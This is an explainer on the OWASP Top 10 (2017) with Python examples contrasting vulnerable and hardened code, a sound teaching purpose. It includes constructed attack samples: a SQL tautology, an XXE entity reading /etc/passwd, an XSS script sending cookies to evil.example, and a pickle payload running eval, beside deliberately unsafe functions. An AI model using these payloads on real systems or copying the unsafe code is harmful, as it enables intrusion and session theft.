What You Need to Know About OWASP’s Top 10 Vulnerabilities List
By Stephen Lockard | February 9, 2020
What Is OWASP?
OWASP stands for the Open Web Application Security Project, a non-profit online community whose mission is to make web applications more secure. The community offers free articles, methodologies, tools, documentation, and technologies, accessible to all. If you are a developer, you have probably come across the OWASP Top 10, a ranked list of the most critical security risks organizations face when coding, configuring, and releasing web applications. The list is revised every few years; the edition current at the time of writing is the 2017 one, and that is the list covered below.
Top 10 OWASP Vulnerabilities
Below is the list from the 2017 edition of the OWASP Top 10, with what each item means and how to address it.
1) Injection
Injection occurs when untrusted data is sent to an interpreter as part of a command or query, so that the interpreter executes part of the attacker's input instead of treating it as data. The most common case is SQL injection, where user input is concatenated into a SQL statement. The reliable fix is to keep data and code separate: use parameterized queries (prepared statements) or an ORM rather than building statements from strings, validate input against an allowlist, and review the source code for every place where input reaches an interpreter, including OS command, LDAP, and NoSQL calls.
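The following is an added example, not code from the original article: a lookup written two ways against a constructed in-memory SQLite database. The string-built query lets a classic tautology payload return every row; the parameterized query treats the same input as a literal username and returns nothing.

```python
import sqlite3


def make_db():
    """Constructed sample database for the demonstration (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def find_user_unsafe(conn, username):
    """Vulnerable: untrusted input is pasted into the SQL text, so the
    interpreter cannot tell where the data ends and the query begins."""
    query = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    """Hardened: the driver sends the value separately from the statement,
    so quotes and keywords in the input remain data."""
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker input: closes the quoted literal and appends a tautology,
# turning the WHERE clause into  username = '' OR '1'='1'
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", find_user_unsafe(db, PAYLOAD))  # every user leaks
    print("safe:  ", find_user_safe(db, PAYLOAD))    # no user is literally named that
```

The same separation applies to every interpreter the application talks to; an allowlist check on the input is a second layer, not a replacement for parameterization.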
2) Broken Authentication
Authentication and session management are often implemented incorrectly, which lets attackers compromise passwords, keys, or session tokens, or otherwise assume other users' identities, for example through credential stuffing or brute force against a login form with no rate limiting. Mitigations include multi-factor authentication, refusing default and known-breached passwords, limiting failed login attempts, issuing a new session ID after login, and invalidating sessions on logout or timeout. An external security review before deploying to production is a useful check that these controls are in place, not a substitute for them.
3) Sensitive Data Exposure
Sensitive data exposure occurs when web applications and APIs fail to protect data such as credit card numbers, social security numbers, personal information, or health records, typically by storing or transmitting it in clear text or with weak cryptography. Start by identifying which data is sensitive under the applicable privacy laws and classifying it, then apply controls per classification: encrypt it in transit with TLS and at rest with current algorithms, and do not store what you do not need. HTTP Strict Transport Security (HSTS) complements this by instructing browsers to use HTTPS only when talking to your site; it does not encrypt stored data.
4) XML External Entities (XXE)
An XML External Entity (XXE) attack occurs when an application parses XML from untrusted sources with a parser that still processes external entity declarations. Attackers use this to read internal files, make the server issue requests to internal systems, or exhaust resources through entity expansion. Prefer simpler data formats such as JSON where possible, disable external entities and DTD processing in every XML parser you use, patch or upgrade XML processors and libraries, and upgrade SOAP to version 1.2 or higher. Use a dependency checker such as OWASP Dependency-Check to find XML libraries with known XXE issues.
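As an added example (not from the article), the loader below implements the "disable DTDs" advice with the Python standard library: a first expat pass rejects any DOCTYPE or entity declaration before anything can be expanded, and only then is the tree built. The XXE payload and the benign document are constructed here for the demonstration.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD or entity declaration."""


def parse_xml_untrusted(data: str) -> ET.Element:
    """Parse XML from an untrusted source, refusing any DOCTYPE or entity declaration.

    With no DTD there is nowhere to declare an external entity, which closes off
    XXE (file disclosure, server-side request forgery) and entity-expansion
    denial of service such as 'billion laughs'.
    """
    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE '{doctype_name}' is not allowed in untrusted input")

    def reject_entity(*_):
        raise UnsafeXML("entity declaration is not allowed in untrusted input")

    # First pass: a bare expat parser whose handlers abort on the first DTD construct.
    probe = xml.parsers.expat.ParserCreate()
    probe.StartDoctypeDeclHandler = reject_doctype
    probe.EntityDeclHandler = reject_entity
    probe.Parse(data, True)
    # Second pass: the document is DTD-free, so build the tree normally.
    return ET.fromstring(data)


def is_rejected(data: str) -> bool:
    """True if the loader refuses the document as unsafe."""
    try:
        parse_xml_untrusted(data)
        return False
    except UnsafeXML:
        return True


# Constructed payload: the classic file-disclosure entity.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<order><note>&xxe;</note></order>"""

BENIGN = "<order><note>hello</note></order>"

if __name__ == "__main__":
    print("benign note:", parse_xml_untrusted(BENIGN).find("note").text)
    print("xxe rejected:", is_rejected(XXE_PAYLOAD))
```

If the application uses lxml instead, the equivalent setting is `XMLParser(resolve_entities=False)`; the defusedxml package wraps the standard-library parsers with the same DOCTYPE rejection shown here.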
5) Broken Access Control
Under broken access control, restrictions on what authenticated users may do are not enforced, so an attacker can act as another user or as an admin, view sensitive files, change access rights, or modify other users' data, often just by changing an ID in a URL. Enforce access control on the server, deny by default, and tie access to record ownership rather than to whatever the client sends. Penetration testing and automated tests are good at finding unintended access paths. Removing unused accounts and applying multi-factor authentication at every access point reduce the impact of stolen credentials, but they do not replace authorization checks.
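An added example, not from the article, of the most common form of this flaw, an insecure direct object reference: the first lookup returns any invoice whose ID the caller guesses; the second checks ownership (or an admin role) server-side and answers "not found" either way, so the response does not reveal which IDs exist. The invoice data and role names are constructed for the demonstration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Invoice:
    id: int
    owner: str
    amount: int


# Constructed sample records standing in for a database table.
INVOICES = {
    101: Invoice(101, "alice", 250),
    102: Invoice(102, "bob", 9000),
}


def get_invoice_unsafe(requesting_user: str, invoice_id: int) -> Optional[Invoice]:
    """Vulnerable: trusts that the client only asks for IDs it may see.
    Changing /invoices/101 to /invoices/102 in the URL reads bob's invoice."""
    return INVOICES.get(invoice_id)


def get_invoice(requesting_user: str, invoice_id: int, roles=()) -> Optional[Invoice]:
    """Hardened: deny by default; the record is returned only if the requester
    owns it or holds the (assumed) 'admin' role. Missing and forbidden look
    identical to the caller, so the endpoint is not an enumeration oracle."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        return None
    if invoice.owner != requesting_user and "admin" not in roles:
        return None
    return invoice


if __name__ == "__main__":
    print("unsafe, alice asks for bob's invoice:", get_invoice_unsafe("alice", 102))
    print("hardened, same request:", get_invoice("alice", 102))
    print("hardened, admin:", get_invoice("carol", 102, roles=("admin",)))
```

The ownership check belongs in the data-access layer so that every route and job that reaches an invoice goes through it; a check duplicated per endpoint is the one that gets forgotten on the next feature.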
6) Security Misconfigurations
Security misconfiguration is among the most common issues in web application deployment. Causes include default or incomplete configurations, unused pages and sample applications, missing or misconfigured HTTP security headers, directory listing, verbose error messages, and open cloud storage buckets. Apply a repeatable hardening process to every application, operating system, library, and framework, review the resulting configuration regularly, and apply upgrades and patches as part of that same process.
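The check below is an added example, not from the article, covering both the HSTS point under item 3 and the HTTP header misconfigurations under item 6: it takes a dict of response headers (two constructed sets, one weak and one hardened) and returns the findings a reviewer would raise. The thresholds, such as a one-year HSTS max-age, are this example's choices.

```python
import re

ONE_YEAR = 31536000  # seconds; the commonly recommended minimum HSTS max-age


def parse_hsts(value: str):
    """Parse 'max-age=31536000; includeSubDomains' into (max_age, include_subdomains)."""
    max_age, include_sub = 0, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        if name.lower() == "max-age" and val.isdigit():
            max_age = int(val)
        elif name.lower() == "includesubdomains":
            include_sub = True
    return max_age, include_sub


def check_security_headers(headers: dict) -> list:
    """Return a list of findings for a dict of HTTP response headers."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    if "strict-transport-security" not in h:
        findings.append("HSTS missing: browsers may still follow http:// links to this host")
    else:
        max_age, include_sub = parse_hsts(h["strict-transport-security"])
        if max_age < ONE_YEAR:
            findings.append("HSTS max-age below one year")
        if not include_sub:
            findings.append("HSTS lacks includeSubDomains")
    csp = h.get("content-security-policy", "")
    if not csp:
        findings.append("Content-Security-Policy missing: no backstop against injected scripts")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options is not 'nosniff'")
    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN") \
            and "frame-ancestors" not in csp:
        findings.append("no clickjacking protection (X-Frame-Options or CSP frame-ancestors)")
    for name in ("server", "x-powered-by"):
        if re.search(r"\d", h.get(name, "")):
            findings.append(f"{name} header leaks a version string: {h[name]}")
    cookie = h.get("set-cookie", "")
    if cookie:
        flags = {part.strip().lower() for part in cookie.split(";")[1:]}
        for flag, label in (("secure", "Secure"), ("httponly", "HttpOnly")):
            if flag not in flags:
                findings.append(f"session cookie lacks the {label} flag")
    return findings


# Constructed header sets: a default install next to a hardened one.
WEAK = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "Content-Type": "text/html",
    "Set-Cookie": "session=abc123; Path=/",
}
HARDENED = {
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "Server": "nginx",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
}

if __name__ == "__main__":
    for finding in check_security_headers(WEAK):
        print("WEAK:", finding)
    print("HARDENED findings:", check_security_headers(HARDENED))
```

Run against a real deployment, the dict would come from the response to a request for the login page over HTTPS; a check like this fits into a post-deploy smoke test so that a configuration regression fails the pipeline instead of waiting for an audit.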
7) Cross Site Scripting (XSS)
Cross-site scripting is a common vulnerability, found in around two-thirds of all web applications. It occurs when a web application includes untrusted data in a page without proper validation or escaping, which lets attackers run scripts in victims' browsers to steal sessions, deface pages, or redirect users to malicious sites. Use frameworks that escape output by default, such as React and Ruby on Rails, and apply context-sensitive encoding (HTML, attribute, JavaScript, URL) wherever untrusted data is placed into a page by hand. A Content Security Policy adds a browser-side backstop that limits which scripts may run if escaping is missed somewhere.
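An added example, not from the article, of server-side output encoding in two contexts. The first renderer interpolates a name straight into HTML; the second escapes it for HTML text and attribute contexts; the third shows the URL context, where a path segment is percent-encoded while the visible label is HTML-escaped. The payloads are constructed for the demonstration.

```python
import html
from urllib.parse import quote


def render_greeting_unsafe(name: str) -> str:
    """Vulnerable: untrusted text becomes part of the page's markup."""
    return f"<p>Hello, {name}!</p>"


def render_greeting(name: str) -> str:
    """Hardened for the HTML text context: &, <, >, " and ' are escaped, so the
    browser renders the input as characters rather than parsing it as tags."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_profile_link(user_id: str, label: str) -> str:
    """Two contexts in one template: the value inside href is a URL path segment
    (percent-encode everything, safe=''), the label is HTML text (HTML-escape)."""
    return f'<a href="/users/{quote(str(user_id), safe="")}">{html.escape(label)}</a>'


# Constructed payloads: a session-stealing script and an attribute breakout.
SCRIPT_PAYLOAD = '<script>location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)"'

if __name__ == "__main__":
    print(render_greeting_unsafe(SCRIPT_PAYLOAD))   # script tag reaches the browser intact
    print(render_greeting(SCRIPT_PAYLOAD))          # &lt;script&gt;... is displayed, not run
    print(render_greeting(ATTR_PAYLOAD))
    print(render_profile_link('1"><script>x', "Alice"))
```

Encoding is context-specific: the HTML escaper above is wrong for data placed inside a `<script>` block or an event handler, and percent-encoding a path segment does nothing against a full attacker-supplied URL with a `javascript:` scheme, which needs a scheme allowlist instead.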
8) Insecure Deserialization
Insecure deserialization occurs when an application deserializes data from an untrusted source. Deserialization flaws can lead to remote code execution, and are also used for injection, replay, and privilege escalation attacks, any of which can compromise the whole application. Do not accept serialized objects from untrusted sources. Where that is unavoidable, verify an integrity check such as a digital signature before deserializing, enforce strict type constraints during deserialization, and run the deserialization code with low privilege and monitoring.
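The following added example (not from the article) shows why "do not deserialize untrusted data" is the rule, using Python's pickle: an object's `__reduce__` tells the unpickler which callable to invoke, so a constructed payload makes `pickle.loads` call `eval` (a harmless stand-in here; `os.system` works the same way). The hardened loader restricts which classes may be resolved, and the JSON loader shows the format-level alternative. The `Order` type is this example's own.

```python
import io
import json
import pickle
from dataclasses import dataclass


@dataclass
class Order:
    item: str
    quantity: int


class Evil:
    """Constructed attacker object: pickle records 'call eval("7 * 6")' as the
    recipe for rebuilding it, so merely loading the bytes runs that code."""
    def __reduce__(self):
        return (eval, ("7 * 6",))


MALICIOUS = pickle.dumps(Evil())  # what an attacker would send in a cookie or request body


def load_unsafe(blob: bytes):
    """Vulnerable: loads whatever the bytes say, including the call to eval."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened: only the allowlisted class may be resolved; every other global
    (builtins.eval, os.system, subprocess.Popen, ...) is refused before it runs."""
    ALLOWED = {(Order.__module__, "Order")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def rejects_payload(blob: bytes) -> bool:
    """True if the restricted loader refuses the bytes."""
    try:
        load_restricted(blob)
        return False
    except pickle.UnpicklingError:
        return True


def load_order_json(text: str) -> Order:
    """Preferred: a data-only format plus explicit type checks. JSON cannot
    name a callable, so there is nothing for an attacker to have invoked."""
    data = json.loads(text)
    if not isinstance(data, dict) or set(data) != {"item", "quantity"}:
        raise ValueError("unexpected fields")
    if not isinstance(data["item"], str) or not isinstance(data["quantity"], int):
        raise ValueError("unexpected types")
    return Order(data["item"], data["quantity"])


if __name__ == "__main__":
    print("unsafe load returned:", load_unsafe(MALICIOUS))        # 42: eval ran
    print("restricted rejects payload:", rejects_payload(MALICIOUS))
    print("restricted loads Order:", load_restricted(pickle.dumps(Order("widget", 3))))
    print("json:", load_order_json('{"item": "widget", "quantity": 3}'))
```

The allowlist approach is a mitigation for code that cannot move off pickle; it still trusts that the allowlisted classes have no dangerous `__setstate__` or `__reduce__` of their own, which is why the JSON path is the real fix.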
9) Using Components with Known Vulnerabilities
Components such as libraries and frameworks run with the same privileges as the application itself, and they may carry known vulnerabilities. According to a report by Sucuri, 56% of all CMS applications were not updated in 2019. Attackers are quick to exploit out-of-date software on web applications, with outcomes ranging from data theft to server takeover. Remove unnecessary dependencies, keep an inventory of component versions, monitor vulnerability databases for those versions, and treat virtual patching (blocking the exploit at a web application firewall) as a stopgap until the component itself is upgraded.
10) Insufficient Logging and Monitoring
Insufficient logging and monitoring lets attackers probe and compromise a web application without being noticed, and breaches are typically discovered long after the fact. Log authentication failures, access control failures, and server-side input validation failures with enough context (who, what, when, from where) to identify suspicious accounts, keep the logs centrally so they survive a compromised host, and set alerts so that attacks are detected and responded to promptly. A useful check is whether your own penetration testing and vulnerability scanning trigger alerts; if they do not, a real attack will not either.
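As an added example (not from the article), here is the kind of detection that item 10 assumes is running over the logs: a sliding-window count of failed logins per source address that flags an address once it crosses a threshold, as credential stuffing does when it cycles through many usernames from one host. The log format and the lines are constructed for the demonstration; the threshold and window are this example's choices.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed application log: "<timestamp> <event> user=<name> ip=<address>".
LOG_LINES = [
    "2020-02-09T10:00:01Z login_failed user=alice ip=203.0.113.7",
    "2020-02-09T10:00:03Z login_ok user=carol ip=198.51.100.4",
    "2020-02-09T10:00:05Z login_failed user=bob ip=203.0.113.7",
    "2020-02-09T10:00:09Z login_failed user=carol ip=203.0.113.7",
    "2020-02-09T10:00:11Z login_failed user=dave ip=198.51.100.4",
    "2020-02-09T10:00:13Z login_failed user=dave ip=203.0.113.7",
    "2020-02-09T10:00:17Z login_failed user=erin ip=203.0.113.7",
    "2020-02-09T10:00:21Z login_failed user=frank ip=203.0.113.7",
    "2020-02-09T10:00:30Z login_ok user=dave ip=198.51.100.4",
]


def parse_line(line: str):
    """Split one log line into (timestamp, raw_timestamp, event, user, ip)."""
    raw_ts, event, user_kv, ip_kv = line.split()
    ts = datetime.strptime(raw_ts, "%Y-%m-%dT%H:%M:%SZ")
    return ts, raw_ts, event, user_kv.split("=", 1)[1], ip_kv.split("=", 1)[1]


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)) -> dict:
    """Return {ip: timestamp} for each address whose failed logins reach
    `threshold` within any `window`; the timestamp is when it first did so."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    alerts = {}
    for ts, raw_ts, event, _user, ip in map(parse_line, lines):
        if event != "login_failed":
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:    # drop failures that aged out of the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = raw_ts
    return alerts


if __name__ == "__main__":
    for ip, when in detect_bruteforce(LOG_LINES).items():
        print(f"ALERT {when}: {ip} exceeded the failed-login threshold")
```

The detection only works because each line carries the outcome, the account and the source address; a log that records "login failed" without the address gives the same analysis nothing to group by, which is the point of logging with context.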
What is OWASP?
OWASP is a non-profit group focused on improving the security of web applications and helping companies develop and maintain secure applications. OWASP offers a free knowledge base of application security information and software tools. The mission of the organization is to make software security visible so that individuals and companies can make informed decisions.
What are the OWASP 10 Threats?
Here is the current (2017 edition) OWASP Top 10, as used by application developers and security teams:
- Injection
- Broken authentication
- Sensitive data exposure
- XML external entities (XXE)
- Broken access control
- Security misconfigurations
- Cross-site scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging and Monitoring
How can I apply for OWASP Certification?
You cannot apply for an OWASP certification because none exists yet. Though it has been discussed within the OWASP organization, there is currently no formal certification. However, some cybersecurity training providers offer courses on the OWASP Top 10 vulnerabilities and how to mitigate them across industries.
How do we test against the OWASP?
Like any other bug, a security vulnerability is cheapest to fix when it is found early, so testing should start well before release. To test your code against the OWASP Top 10, you can follow these steps:
- Create a test environment for your project so you can assess its level of security without touching production data.
- Identify all entry points where untrusted data enters your application: request parameters, headers, cookies, file uploads, APIs, and message queues.
- Analyze how your code behaves when each entry point receives malicious input, and what an attacker could observe or change.
- Determine how to change your code so the weakness cannot be exploited, fix it, and add a regression test so it stays fixed.
What is the OWASP Dependency-Check?
OWASP Dependency-Check is an open-source Software Composition Analysis (SCA) tool that helps developers identify known, publicly disclosed vulnerabilities in a project's dependencies. It has full support for Java and .NET, with experimental analyzers for other ecosystems including Python, Ruby, and Node.js. Dependency-Check works by determining whether a Common Platform Enumeration (CPE) identifier matches a given dependency; if so, it generates a report linking the dependency to the associated Common Vulnerabilities and Exposures (CVE) entries.
How does CodeScan solutions work with OWASP?
When running a project in the CodeScan system, CodeScan automatically tests your code against the OWASP Top 10 along with the CWE/SANS Top 25. The resulting security report shows the potentially vulnerable areas of your code: both vulnerabilities and security hotspots, and where each one sits in your code.